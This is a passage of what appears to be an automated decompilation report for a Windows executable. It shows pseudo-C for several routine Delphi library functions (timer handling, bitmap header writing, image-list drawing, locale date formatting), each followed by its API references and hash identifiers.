                                                                        								__eflags =  *(_t172 + 0x249) & 0x00000002;
                                                                        								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 >= 0) {
                                                                        										_t173 = _v8;
                                                                        										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
                                                                        										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
                                                                        											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
                                                                        											if(__eflags <= 0) {
                                                                        												_t177 = _v20;
                                                                        												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
                                                                        												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
                                                                        												E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
                                                                        												_push( &_v132);
                                                                        												_t184 = E004037D8(_v8, __eflags);
                                                                        												__eflags = _t184;
                                                                        												if(_t184 != 0) {
                                                                        													 *((char*)(_v8 + 0x28e)) = 5;
                                                                        													 *((intOrPtr*)( *_v8 + 0x88))();
                                                                        													E0045E280(_v8, _t253, _t294, 0xffa3);
                                                                        													_v21 = 1;
                                                                        													SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L37;
                                                                        							}
                                                                        							__eflags = _v20;
                                                                        							if(_v20 < 0) {
                                                                        								goto L31;
                                                                        							}
                                                                        							_t193 = _v8;
                                                                        							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
                                                                        							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
                                                                        								goto L31;
                                                                        							}
                                                                        							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
                                                                        							if(__eflags > 0) {
                                                                        								goto L31;
                                                                        							}
                                                                        							_t197 = _v16;
                                                                        							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
                                                                        							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
                                                                        							E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
                                                                        							_push( &_v132);
                                                                        							_t204 = E004037D8(_v8, __eflags);
                                                                        							__eflags = _t204;
                                                                        							if(_t204 != 0) {
                                                                        								 *((char*)(_v8 + 0x28e)) = 4;
                                                                        								 *((intOrPtr*)( *_v8 + 0x88))();
                                                                        								E0045E280(_v8, _t253, _t294, 0xffa2);
                                                                        								_v21 = 1;
                                                                        								SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
                                                                        							}
                                                                        							goto L37;
                                                                        						}
                                                                        						_t213 = _v8;
                                                                        						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
                                                                        						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
                                                                        							goto L25;
                                                                        						}
                                                                        						_t215 = _v8;
                                                                        						__eflags =  *(_t215 + 0x249) & 0x00000004;
                                                                        						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
                                                                        							 *((char*)(_v8 + 0x28e)) = 1;
                                                                        							SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
                                                                        							__eflags = _v9 & 0x00000001;
                                                                        							if((_v9 & 0x00000001) == 0) {
                                                                        								E0045EDB8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
                                                                        							} else {
                                                                        								E0045ED30(_v8, _t259,  &_v20, _t294);
                                                                        							}
                                                                        							goto L37;
                                                                        						}
                                                                        						_t284 = _v8;
                                                                        						_t224 = _v20;
                                                                        						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
                                                                        						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
                                                                        							L20:
                                                                        							E0045EDB8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
                                                                        							E00460DB4(_v8, _t294, _t297);
                                                                        							L21:
                                                                        							E004037D8(_v8, __eflags);
                                                                        							goto L37;
                                                                        						}
                                                                        						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
                                                                        						if(__eflags != 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						E0045C698(_v8);
                                                                        						goto L21;
                                                                        					}
                                                                        					__eflags = _v9 & 0x00000040;
                                                                        					if(__eflags == 0) {
                                                                        						goto L8;
                                                                        					} else {
                                                                        						E004037D8(_v8, __eflags);
                                                                        						goto L37;
                                                                        					}
                                                                        				}
                                                                        				if(E004037D8(_v8, _t305) != 0) {
                                                                        					L3:
                                                                        					 *((intOrPtr*)( *_v8 + 0xc0))();
                                                                        					_t248 = E0045C608(_v8, _t307);
                                                                        					_t308 = _t248;
                                                                        					if(_t248 == 0) {
                                                                        						return E004367E4(_v8, 0, _t308);
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				_t252 = E0044DA34(_v8);
                                                                        				_t307 = _t252;
                                                                        				if(_t252 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L3;
                                                                        			}






































                                                                        APIs
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045FFF9
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004600E4
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004601A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Timer
                                                                        • String ID: @
                                                                        • API String ID: 2870079774-2766056989
                                                                        • Opcode ID: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction ID: ca72aae42d446a3379f6ca7453f2662bbf2d4cae35f29f2d7e84bd41c12cedf4
                                                                        • Opcode Fuzzy Hash: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction Fuzzy Hash: CCC14A34A04208EFDB00DB99C985FDEB7F5AF09304F2441A6E844AB392DB79AF45DB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004258E4(void* __eax, signed int __ecx, intOrPtr* __edx, void* __eflags) {
                                                                        				void* __ebp;
                                                                        				signed int _t93;
                                                                        				void* _t108;
                                                                        				signed int _t114;
                                                                        				void* _t125;
                                                                        				signed int _t140;
                                                                        				signed int _t146;
                                                                        				signed int _t160;
                                                                        				intOrPtr _t197;
                                                                        				intOrPtr* _t201;
                                                                        				void* _t202;
                                                                        				intOrPtr _t204;
                                                                        				signed int* _t205;
                                                                        
                                                                        				_t160 = __ecx;
                                                                        				_t201 = __edx;
                                                                        				_t202 = __eax;
                                                                        				E00402EF0( &(_t205[4]), 0xe);
                                                                        				_t205[4] = 0x4d42;
                                                                        				_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c));
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)) != 0) {
                                                                        					 *_t205 = E0041694C(_t203);
                                                                        					if(_t160 != 0) {
                                                                        						E00416B7C(_t201, 4, _t205);
                                                                        					}
                                                                        					E0041694C( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)));
                                                                        					return  *((intOrPtr*)( *_t201 + 0xc))();
                                                                        				}
                                                                        				E004249D0(_t202, 0xe);
                                                                        				_t204 =  *((intOrPtr*)(_t202 + 0x28));
                                                                        				 *_t205 = 0;
                                                                        				_t93 =  *(_t204 + 0x14);
                                                                        				__eflags = _t93;
                                                                        				if(__eflags != 0) {
                                                                        					 *_t205 =  *_t205 + _t205[2] + 0xe;
                                                                        					E00402EF0( &(_t205[4]), 0xe);
                                                                        					_t205[4] = 0x4d42;
                                                                        					_t125 = E00424894(_t202);
                                                                        					_t197 =  *0x425b98; // 0x1
                                                                        					E00420804(_t125, 0, _t197);
                                                                        					_t205[3] = E00420B28(SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4),  *(_t204 + 0x14)));
                                                                        					_t205[1] = GetDIBColorTable( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), 0, 0x100,  &(_t205[0xa]));
                                                                        					SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), _t205[3]);
                                                                        					_t140 =  *(_t204 + 0x50);
                                                                        					__eflags = _t140;
                                                                        					if(_t140 > 0) {
                                                                        						__eflags = _t140 - _t205[1];
                                                                        						if(_t140 < _t205[1]) {
                                                                        							_t205[1] = _t140;
                                                                        						}
                                                                        					}
                                                                        					__eflags =  *((char*)(_t204 + 0x70));
                                                                        					if( *((char*)(_t204 + 0x70)) == 0) {
                                                                        						__eflags = _t205[1];
                                                                        						if(_t205[1] == 0) {
                                                                        							__eflags =  *(_t204 + 0x10);
                                                                        							if( *(_t204 + 0x10) != 0) {
                                                                        								__eflags =  *((char*)(_t204 + 0x71));
                                                                        								if( *((char*)(_t204 + 0x71)) == 0) {
                                                                        									_t205[1] = E004212BC( *(_t204 + 0x10), 0xff,  &(_t205[0xa]));
                                                                        									__eflags =  *((short*)(_t204 + 0x3e)) - 8;
                                                                        									if( *((short*)(_t204 + 0x3e)) > 8) {
                                                                        										_t146 = _t205[1] << 2;
                                                                        										 *_t205 =  *_t205 + _t146;
                                                                        										_t47 =  &(_t205[2]);
                                                                        										 *_t47 = _t205[2] + _t146;
                                                                        										__eflags =  *_t47;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t205[4] =  *_t205;
                                                                        					_t93 = _t205[2] + 0xe;
                                                                        					__eflags = _t93;
                                                                        					_t205[6] = _t93;
                                                                        				}
                                                                        				__eflags = _t160;
                                                                        				if(_t160 != 0) {
                                                                        					_t93 = E00416B7C(_t201, 4, _t205);
                                                                        				}
                                                                        				__eflags =  *_t205;
                                                                        				if( *_t205 == 0) {
                                                                        					return _t93;
                                                                        				} else {
                                                                        					E004239AC(_t204 + 0x18);
                                                                        					__eflags = _t205[1];
                                                                        					if(_t205[1] == 0) {
                                                                        						L27:
                                                                        						__eflags =  *((char*)(_t204 + 0x70));
                                                                        						if( *((char*)(_t204 + 0x70)) == 0) {
                                                                        							E00416B7C(_t201, 0xe,  &(_t205[4]));
                                                                        							E00416B7C(_t201, 0x28, _t204 + 0x30);
                                                                        							__eflags =  *((short*)(_t204 + 0x3e)) - 8;
                                                                        							if( *((short*)(_t204 + 0x3e)) > 8) {
                                                                        								__eflags =  *(_t204 + 0x40) & 0x00000003;
                                                                        								if(( *(_t204 + 0x40) & 0x00000003) != 0) {
                                                                        									E00416B7C(_t201, 0xc, _t204 + 0x58);
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t108 = _t204 + 0x30;
                                                                        							_t205[7] = 0xc;
                                                                        							_t205[8] =  *((intOrPtr*)(_t108 + 4));
                                                                        							_t205[9] =  *((intOrPtr*)(_t108 + 8));
                                                                        							_t205[9] = 1;
                                                                        							_t205[0xa].rgbBlue =  *((intOrPtr*)(_t108 + 0xe));
                                                                        							E00416B7C(_t201, 0xe,  &(_t205[4]));
                                                                        							E00416B7C(_t201, 0xc,  &(_t205[7]));
                                                                        						}
                                                                        						__eflags = 0 * _t205[1];
                                                                        						E00416B7C(_t201, 0 * _t205[1],  &(_t205[0xa]));
                                                                        						return E00416B7C(_t201,  *((intOrPtr*)(_t204 + 0x44)),  *((intOrPtr*)(_t204 + 0x2c)));
                                                                        					}
                                                                        					_t114 =  *(_t204 + 0x50);
                                                                        					__eflags = _t114;
                                                                        					if(_t114 == 0) {
                                                                        						L24:
                                                                        						 *(_t204 + 0x50) = _t205[1];
                                                                        						L25:
                                                                        						__eflags =  *((char*)(_t204 + 0x70));
                                                                        						if( *((char*)(_t204 + 0x70)) != 0) {
                                                                        							E00420F98( &(_t205[0xa]),  &(_t205[1]));
                                                                        						}
                                                                        						goto L27;
                                                                        					}
                                                                        					__eflags = _t114 - _t205[1];
                                                                        					if(_t114 == _t205[1]) {
                                                                        						goto L25;
                                                                        					}
                                                                        					goto L24;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • SelectObject.GDI32(?,?), ref: 004259E0
                                                                        • GetDIBColorTable.GDI32(?,00000000,00000100,?,?,?), ref: 00425A01
                                                                        • SelectObject.GDI32(?,?), ref: 00425A16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ObjectSelect$ColorTable
                                                                        • String ID: BM
                                                                        • API String ID: 2377976745-2348483157
                                                                        • Opcode ID: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction ID: 6c74de65949b55c7261e36db3c671f3cf5b5c64a81c24a0a4976f9b404168564
                                                                        • Opcode Fuzzy Hash: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction Fuzzy Hash: BC8116707083559BD710EF28D485BAE77E1AF88314F44892EF889CB391D778E985CB4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00443A2C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr* _v16;
                                                                        				intOrPtr* _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _t60;
                                                                        				void* _t102;
                                                                        				intOrPtr _t106;
                                                                        				void* _t112;
                                                                        				intOrPtr _t126;
                                                                        				intOrPtr _t141;
                                                                        				void* _t148;
                                                                        				void* _t149;
                                                                        				intOrPtr _t150;
                                                                        
                                                                        				_t148 = _t149;
                                                                        				_t150 = _t149 + 0xffffffe8;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_v28 = 0;
                                                                        				_v24 = 0;
                                                                        				_t112 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t148);
                                                                        				_push(0x443c43);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t150;
                                                                        				if(E00443514(_v8) == 0) {
                                                                        					L6:
                                                                        					E004037D8(_v8, __eflags);
                                                                        					__eflags = 0;
                                                                        					_pop(_t126);
                                                                        					 *[fs:eax] = _t126;
                                                                        					_push(0x443c4a);
                                                                        					return E0040436C( &_v28, 2);
                                                                        				} else {
                                                                        					E004442B8(_v8, __edx, __ecx, __ecx, __ecx);
                                                                        					_v12 = E004438EC(_v8, __edx, _a4, __ecx, __ecx);
                                                                        					if(_v12 == 0xffffffff) {
                                                                        						_t60 =  *0x4958fc; // 0x41d54c
                                                                        						E00406548(_t60,  &_v28);
                                                                        						E0040A17C(_v28, 1);
                                                                        						E00403DA8();
                                                                        						goto L6;
                                                                        					} else {
                                                                        						 *[fs:eax] = _t150;
                                                                        						_v16 = E004242CC(1);
                                                                        						 *[fs:eax] = _t150;
                                                                        						 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x443bd4, _t148,  *[fs:eax], 0x443bf4, _t148);
                                                                        						 *((intOrPtr*)( *_v16 + 0x40))();
                                                                        						_v20 = E004242CC(1);
                                                                        						 *[fs:eax] = _t150;
                                                                        						E004256E4(_v20, 1);
                                                                        						 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x443bb7, _t148);
                                                                        						 *((intOrPtr*)( *_v20 + 0x40))();
                                                                        						L00426AD8();
                                                                        						L00426AD8();
                                                                        						_push( *((intOrPtr*)( *_v16 + 0x64))( *((intOrPtr*)( *_v20 + 0x64))(E004436E8(_v8), _v12, E00420730(E00424894(_v20)), 0, 0, 0x10, E004436E8(_v8), _v12, E00420730(E00424894(_v16)), 0, 0, 0)));
                                                                        						_push(_t112);
                                                                        						_t102 = E004436E8(_v8);
                                                                        						_push(_t102);
                                                                        						L00426AE0();
                                                                        						if(_t102 == 0) {
                                                                        							_t106 =  *0x4958fc; // 0x41d54c
                                                                        							E00406548(_t106,  &_v24);
                                                                        							E0040A17C(_v24, 1);
                                                                        							E00403DA8();
                                                                        						}
                                                                        						_pop(_t141);
                                                                        						 *[fs:eax] = _t141;
                                                                        						_push(0x443bbe);
                                                                        						return E004035DC(_v20);
                                                                        					}
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 004438EC: 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B30
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000010,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4), ref: 00443B56
                                                                        • 73452330.COMCTL32(00000000,?,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B77
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73452500$73452073452330LoadString
                                                                        • String ID: DA
                                                                        • API String ID: 579128689-2080325668
                                                                        • Opcode ID: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction ID: d8424a2b104fe4f1d5b96f464bae46b84877e40d637dfa1592dbc8658c5b6140
                                                                        • Opcode Fuzzy Hash: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction Fuzzy Hash: 79511074A00215EFD700EFA9D892E9DB7F5FF49705F6144A6F800AB761CA35AE00DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00409D0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				void* _t41;
                                                                        				signed int _t45;
                                                                        				signed int _t47;
                                                                        				signed int _t49;
                                                                        				signed int _t51;
                                                                        				intOrPtr _t75;
                                                                        				void* _t76;
                                                                        				signed int _t77;
                                                                        				signed int _t83;
                                                                        				signed int _t92;
                                                                        				intOrPtr _t111;
                                                                        				void* _t122;
                                                                        				void* _t124;
                                                                        				intOrPtr _t127;
                                                                        				void* _t128;
                                                                        
                                                                        				_t128 = __eflags;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_t122 = __edx;
                                                                        				_t124 = __eax;
                                                                        				_push(_t127);
                                                                        				_push(0x409ed6);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t127;
                                                                        				_t92 = 1;
                                                                        				E00404348(__edx);
                                                                        				E004099D4(GetThreadLocale(), 0x409eec, 0x1009,  &_v12);
                                                                        				if(E004087C0(0x409eec, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                        					while(1) {
                                                                        						_t41 = E00404600(_t124);
                                                                        						__eflags = _t92 - _t41;
                                                                        						if(_t92 > _t41) {
                                                                        							goto L28;
                                                                        						}
                                                                        						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                        						asm("bt [0x47a0c0], eax");
                                                                        						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                        							_t45 = E00408D38(_t124 + _t92 - 1, 2, 0x409ef0);
                                                                        							__eflags = _t45;
                                                                        							if(_t45 != 0) {
                                                                        								_t47 = E00408D38(_t124 + _t92 - 1, 4, 0x409f00);
                                                                        								__eflags = _t47;
                                                                        								if(_t47 != 0) {
                                                                        									_t49 = E00408D38(_t124 + _t92 - 1, 2, 0x409f18);
                                                                        									__eflags = _t49;
                                                                        									if(_t49 != 0) {
                                                                        										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                        										__eflags = _t51;
                                                                        										if(_t51 == 0) {
                                                                        											L24:
                                                                        											E00404608(_t122, 0x409f30);
                                                                        										} else {
                                                                        											__eflags = _t51 != 0x20;
                                                                        											if(_t51 != 0x20) {
                                                                        												E00404528();
                                                                        												E00404608(_t122, _v24);
                                                                        											} else {
                                                                        												goto L24;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										E00404608(_t122, 0x409f24);
                                                                        										_t92 = _t92 + 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00404608(_t122, 0x409f10);
                                                                        									_t92 = _t92 + 3;
                                                                        								}
                                                                        							} else {
                                                                        								E00404608(_t122, 0x409efc);
                                                                        								_t92 = _t92 + 1;
                                                                        							}
                                                                        							_t92 = _t92 + 1;
                                                                        							__eflags = _t92;
                                                                        						} else {
                                                                        							_v8 = E0040AA54(_t124, _t92);
                                                                        							E00404858(_t124, _v8, _t92,  &_v20);
                                                                        							E00404608(_t122, _v20);
                                                                        							_t92 = _t92 + _v8;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t75 =  *0x4967f4; // 0x9
                                                                        					_t76 = _t75 - 4;
                                                                        					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                        						_t77 = 1;
                                                                        					} else {
                                                                        						_t77 = 0;
                                                                        					}
                                                                        					if(_t77 == 0) {
                                                                        						E0040439C(_t122, _t124);
                                                                        					} else {
                                                                        						while(_t92 <= E00404600(_t124)) {
                                                                        							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                        							__eflags = _t83;
                                                                        							if(_t83 != 0) {
                                                                        								__eflags = _t83 != 0x20;
                                                                        								if(_t83 != 0x20) {
                                                                        									E00404528();
                                                                        									E00404608(_t122, _v16);
                                                                        								}
                                                                        							}
                                                                        							_t92 = _t92 + 1;
                                                                        							__eflags = _t92;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L28:
                                                                        				_pop(_t111);
                                                                        				 *[fs:eax] = _t111;
                                                                        				_push(E00409EDD);
                                                                        				return E0040436C( &_v24, 4);
                                                                        			}
























                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409ED6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409D3B
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: eeee$ggg$yyyy
                                                                        • API String ID: 4232894706-1253427255
                                                                        • Opcode ID: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction ID: b6f270290c82287ec602cd9da47892ec98d791b565545ab25068ff88157d7675
                                                                        • Opcode Fuzzy Hash: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction Fuzzy Hash: B041F3743041054BC711EAA9C8816BFB395DFC5308B64483BE582F33D7EA3DAC0296AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00443F90(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr* _v16;
                                                                        				intOrPtr* _v20;
                                                                        				char _v36;
                                                                        				intOrPtr _t69;
                                                                        				void* _t90;
                                                                        				intOrPtr _t108;
                                                                        				void* _t117;
                                                                        				void* _t118;
                                                                        				void* _t119;
                                                                        				void* _t120;
                                                                        				void* _t121;
                                                                        				intOrPtr _t122;
                                                                        
                                                                        				_t120 = _t121;
                                                                        				_t122 = _t121 + 0xffffffe0;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				E00412BCC( *((intOrPtr*)(_v8 + 0x34)), 0,  &_v36,  *((intOrPtr*)(_v8 + 0x30)));
                                                                        				E00444A0C(_v8);
                                                                        				 *[fs:eax] = _t122;
                                                                        				_v16 = E004242CC(1);
                                                                        				 *[fs:eax] = _t122;
                                                                        				 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x4440fb, _t120,  *[fs:eax], 0x444118, _t120, __edi, __esi, __ebx, _t119);
                                                                        				 *((intOrPtr*)( *_v16 + 0x40))();
                                                                        				_v20 = E004242CC(1);
                                                                        				 *[fs:eax] = _t122;
                                                                        				E004256E4(_v20, 1);
                                                                        				 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x4440de, _t120);
                                                                        				 *((intOrPtr*)( *_v20 + 0x40))();
                                                                        				_t69 = _v12;
                                                                        				_push(_t69);
                                                                        				L00426AA0();
                                                                        				_t117 = _t69 - 1;
                                                                        				if(_t117 >= 0) {
                                                                        					_t118 = _t117 + 1;
                                                                        					_t90 = 0;
                                                                        					do {
                                                                        						E004202E8(E00424894(_v16),  &_v36);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(E00420730(_t74));
                                                                        						_push(_t90);
                                                                        						_push(_v12);
                                                                        						L00426AD8();
                                                                        						E004202E8(E00424894(_v20),  &_v36);
                                                                        						_push(0x10);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(E00420730(_t81));
                                                                        						_push(_t90);
                                                                        						_push(_v12);
                                                                        						L00426AD8();
                                                                        						E00443820(_v8, _t90, _v20, _v16, _t118, 0);
                                                                        						_t90 = _t90 + 1;
                                                                        						_t118 = _t118 - 1;
                                                                        					} while (_t118 != 0);
                                                                        				}
                                                                        				_pop(_t108);
                                                                        				 *[fs:eax] = _t108;
                                                                        				_push(0x4440e5);
                                                                        				return E004035DC(_v20);
                                                                        			}


















                                                                        APIs
                                                                        • 73451FD0.COMCTL32(?,?,?,00000000,00444118), ref: 0044404F
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00444118), ref: 00444085
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 004440B1
                                                                          • Part of subcall function 00443820: 734520C0.COMCTL32(?,00000000,00000000,00000000,004438B2,?,00000000,004438CF), ref: 00443894
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73452500$73451734520FillRect
                                                                        • String ID: DA
                                                                        • API String ID: 3869139703-2080325668
                                                                        • Opcode ID: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction ID: 274bc86385f0dda2e4b4f1d6e4670416b346b4c3e9b855bbcb09a17cbb89921f
                                                                        • Opcode Fuzzy Hash: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
